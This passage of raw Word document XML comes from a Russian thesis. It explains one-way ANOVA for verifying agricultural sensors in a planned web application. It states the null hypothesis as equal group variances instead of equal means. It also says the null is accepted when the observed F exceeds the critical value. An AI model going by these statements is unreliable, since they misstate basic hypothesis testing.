      <w:r w:rsidR="00BD63ED" w:rsidRPr="001F5DAE">
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:commentReference w:id="18"/>
      </w:r>
      <w:r w:rsidRPr="001F5DAE">
        <w:t>этого прибора (тогда классы градации – версия прибора),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или исследуется </w:t>
      </w:r>
      <w:r w:rsidR="00BA1029">
        <w:t xml:space="preserve">зависимость </w:t>
      </w:r>
      <w:r>
        <w:t>урожайнос</w:t>
      </w:r>
      <w:r w:rsidR="00BA1029">
        <w:t>ти</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сельскохозяйственного поля</w:t>
      </w:r>
      <w:r w:rsidR="00BA1029">
        <w:t xml:space="preserve"> от к</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">оличества внесённых удобрений, количества воды при </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>автоорошении</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и типа почвы (тогда классы градации – количество удобрений, количество воды при </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>автоорошении</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и тип почвы)</w:t>
      </w:r>
      <w:r w:rsidR="005C1D63">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Минимальное число классов градации (групп) – два.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54879A49" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="008B1D74" w:rsidRDefault="0093378B" w:rsidP="001C29A8">
      <w:r>
        <w:t>Дисперсионный анализ – почти универсальный метод проверки различий в группах, поскольку применяется как в технических науках и сельском хозяйстве, так и в исследованиях поведения человека.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136B2EA" w14:textId="5A015978" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="001C29A8">
      <w:r>
        <w:t xml:space="preserve">При дисперсионном анализе исследуется отношение двух дисперсий. Дисперсия – характеристика рассеивания данных вокруг среднего значения. Первая – дисперсия, объяснённая влиянием фактора вокруг средней всех </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>данных. Вторая – необъяснённая дисперсия, которая характеризует рассеивание данных внутри градаций (групп) вокруг средних значений самих групп. Первую дисперсию можно назвать межгрупповой, а вторую – внутригрупповой. Отношение этих дисперсий называется фактическим отношением Фишера и сравнивается с критическим значением отношения Фишера. Если фактическое отношение Фишера больше критического, то средние классов градации отличаются друг от друга и исследуемый фактор существенно влияет на изменение данных. Если меньше, то средние градаций не отличаются друг от друга, и фактор не имеет существенного влияния.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AB763" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="001C29A8">
      <w:r>
        <w:t xml:space="preserve">Данный вид статистического анализа можно провести на данных полученных лабораторией «Сектор средств инструментального контроля», где разрабатываются приборы для сбора информации о агроэкосистеме с полей, такие как: датчики-влагомеры, которые заглубляются в почву и получают информацию о влажности всех слоев почвы в реальном времени; цифровая метеостанция, которая может измерять в автоматическом режиме температуру поверхности земли, солнечное излучение, направление и скорость ветра, и т.д.. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA3EE3" w14:textId="0C0CE57D" w:rsidR="0093378B" w:rsidRPr="00AE0E1C" w:rsidRDefault="0093378B" w:rsidP="001C29A8">
      <w:r>
        <w:t>Данные приборы нуждаются в верификации – проверк</w:t>
      </w:r>
      <w:r w:rsidR="004D038C">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гипотезы о том, что те метрики, которые были получены в цифровом виде приборами, соответствуют реальным измерениям, полученными вручную опытным путём. Также необходимо нахождение существенных различий между некими качественными параметрами приборов, например – поколение разработанного прибора. Для решения этих задач метод дисперсионного анализа очень хорошо подходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB4FD9" w14:textId="7160C940" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E301E6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc161568206"/>
      <w:bookmarkStart w:id="20" w:name="_Toc162709233"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Математическая модель дисперсионного анализа и непараметрические методы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2915999B" w14:textId="71B148FF" w:rsidR="00DC68C3" w:rsidRPr="00DC68C3" w:rsidRDefault="00DC68C3" w:rsidP="00DC68C3">
      <w:r>
        <w:t xml:space="preserve">В разрабатываемом веб-приложении необходимо запрограммировать статистический модуль: компонент, в котором реализован метод обработки наблюдений с помощью дисперсионного анализа. В данном параграфе будет рассмотрена математическая модель, те формулы, которые позволяют </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>провести однофакторный дисперсионный анализ, с применением непараметрических методов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A231951" w14:textId="37743243" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:r>
        <w:t>Однофакторный анализ является простейшим случаем дисперсионного анализа. В этом параграфе будут рассмотрены математические модели однофакторного анализа, а также модель анализа с ранжированными данными. Однофакторный случай выбран по причине относительной простоты программировани</w:t>
      </w:r>
      <w:r w:rsidR="004D038C">
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:t>, а также простоты интерпретации результатов</w:t>
      </w:r>
      <w:r w:rsidR="004D038C">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D038C">
        <w:t>В</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> основном</w:t>
      </w:r>
      <w:r w:rsidR="004D038C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в полевых условиях исследуется один фактор с несколькими градациями. Для проведения такого сорта анализа необходимо, чтобы исследуемые популяции были нормально распределены и имели равную дисперсию </w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00BD5112">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>. Если данные условия не соблюдаются, то необходимо провести эксперимент с ранжированными данными, этот случай будет разобран в конце параграфа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24696790" w14:textId="105B90E1" w:rsidR="00DC68C3" w:rsidRPr="008F14CF" w:rsidRDefault="00DC68C3" w:rsidP="004D79A4">
      <w:r>
        <w:t xml:space="preserve">При проведении статистического анализа необходимо сформулировать две гипотезы: нулевую </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:sSubPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSubPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>H</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>0</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidRPr="00DC68C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и альтернативную </w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:sSubPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSubPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>H</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>1</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidRPr="00DC68C3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Нулевая гипотеза, в случае дисперсионного анализа, говорит о том, что дисперсии в группах не отличаются, что означает отсутствие влияния исследуемого фактора на </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t>переменную-</w:t>
      </w:r>
      <w:r>
        <w:t>отклик, альтернативная гипотеза утверждает обратное – дисперсии в группах различаются</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t xml:space="preserve">, присутствует статистически значимое влияние исследуемого фактора на переменную-отклик. Итогом проведения анализа является </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t xml:space="preserve">значение и фактическое значение Фишера, исходя из значений этих переменных исследователь сможет отклонить нулевую гипотезу и принять альтернативную, только в том случае, если </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t xml:space="preserve">уровень значимости меньше 0.05 или фактическое значение Фишера больше критического (табличного) значения Фишера. Если </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t xml:space="preserve">уровень значимости больше </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t>0.05</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF" w:rsidRPr="008F14CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t>и фактическое значение Фишера больше критического, то в таком случае принимается нулевая гипотеза и отклоняется альтернативная.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8EF7F8" w14:textId="21E26206" w:rsidR="0093378B" w:rsidRPr="00107CA1" w:rsidRDefault="0093378B" w:rsidP="00B013D2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Основа однофакторного дисперсионного анализа заключается в том, что сумму квадратов отклонений исследуемой модели можно разделить на компоненты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB99C5" w14:textId="35BAC9E4" w:rsidR="0093378B" w:rsidRPr="00B013D2" w:rsidRDefault="0093378B" w:rsidP="00B013D2">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CCEAF1" wp14:editId="075E898D">
            <wp:extent cx="914400" cy="1619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3E5DFAD0" wp14:editId="3B3105E5">
            <wp:extent cx="914400" cy="16192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66369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD6E8A3" w14:textId="494F6E2E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00B013D2">
      <w:r>
        <w:t xml:space="preserve">где </w:t>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366BE08B" wp14:editId="487EF37A">
            <wp:extent cx="238125" cy="1428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63920C4F" wp14:editId="31E826B1">
            <wp:extent cx="238125" cy="1428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66369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- объяснённая сумма квадратов отклонений, </w:t>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74EF2E67" wp14:editId="2E3C4504">
            <wp:extent cx="228600" cy="1428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16D4215A" wp14:editId="4D7782B1">
            <wp:extent cx="228600" cy="1428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66369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – необъяснённая сумма квадратов отклонений или сумма квадратов отклонений ошибки, </w:t>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63103DF4" wp14:editId="2BDBFCBB">
            <wp:extent cx="209550" cy="16192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125A5B1" wp14:editId="2493C8D3">
            <wp:extent cx="209550" cy="1619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6369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – общая сумма квадратов отклонений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A7BFC1" w14:textId="0A309408" w:rsidR="0093378B" w:rsidRPr="0015133F" w:rsidRDefault="0093378B" w:rsidP="00B013D2">
      <w:r>
        <w:t xml:space="preserve">Обозначим </w:t>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C5227EF" wp14:editId="599026E2">
            <wp:extent cx="133350" cy="1428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16D2AAE2" wp14:editId="6CE2F37E">
            <wp:extent cx="133350" cy="14287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6369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">число вариантов в каждой группе, и </w:t>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF261C7" wp14:editId="79D27392">
            <wp:extent cx="133350" cy="1619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2F9DDDEE" wp14:editId="3D3B4E5F">
            <wp:extent cx="133350" cy="1619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6369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B013D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">общее число групп (градаций фактора), то </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287449C6" w14:textId="0075B29A" w:rsidR="0093378B"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5657D25B" wp14:editId="66A5EB32">
            <wp:extent cx="600075" cy="4095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095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22DDBEB" wp14:editId="2DB879D3">
            <wp:extent cx="600075" cy="4095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09575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EF1BF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0015133F">
      <w:r w:rsidRPr="00B013D2">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это </w:t>
      </w:r>
      <w:r w:rsidRPr="0015133F">
        <w:t>общее число наблюдений в экспериментальной модели.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CCE46F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004D79A4">
      <w:r>
        <w:t>Можно получить следующие формулы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24644B12" w14:textId="6730D058" w:rsidR="0093378B" w:rsidRPr="00A82002"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345A82EA" wp14:editId="7103F6E3">
            <wp:extent cx="1276350" cy="4095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4095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F5D1BDC" wp14:editId="1DDFB01C">
            <wp:extent cx="1276350" cy="40957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409575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BF681E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0B5BA" w14:textId="56B5B934" w:rsidR="0093378B" w:rsidRPr="0043580C"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02029108" wp14:editId="2BA01D0C">
            <wp:extent cx="1447800" cy="4381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7800" cy="438150"/>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378285AC" wp14:editId="688AF87A">
            <wp:extent cx="1447800" cy="4381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7800" cy="438150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BF681E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E685F49" w14:textId="148ED5B0" w:rsidR="0093378B" w:rsidRPr="004E1DBB"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254EDFF2" wp14:editId="184BBD55">
            <wp:extent cx="1323975" cy="4476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5DF203D4" wp14:editId="69BB689E">
            <wp:extent cx="1323975" cy="4476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r w:rsidRPr="0066369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BF681E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F17274" w:rsidRPr="004E1DBB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C4EA3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0043580C">
      <w:r>
        <w:t>где</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0171E4" w14:textId="46A87397" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0043580C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2889CFB5" wp14:editId="52BF7933">
            <wp:extent cx="933450" cy="4381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3450" cy="438150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F2179D" wp14:editId="685D2DF8">
            <wp:extent cx="933450" cy="4381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3450" cy="438150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D06CCC">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BF681E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="00A43272">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B3E40" w14:textId="4767399A" w:rsidR="0093378B" w:rsidRPr="00107CA1" w:rsidRDefault="0093378B" w:rsidP="0043580C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> QUOTE </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6780B91A" wp14:editId="617E73D9">
            <wp:extent cx="790575" cy="4381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66369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5049F6D5" wp14:editId="729903E1">
            <wp:extent cx="790575" cy="43815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66369B">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BF681E">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00107CA1">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
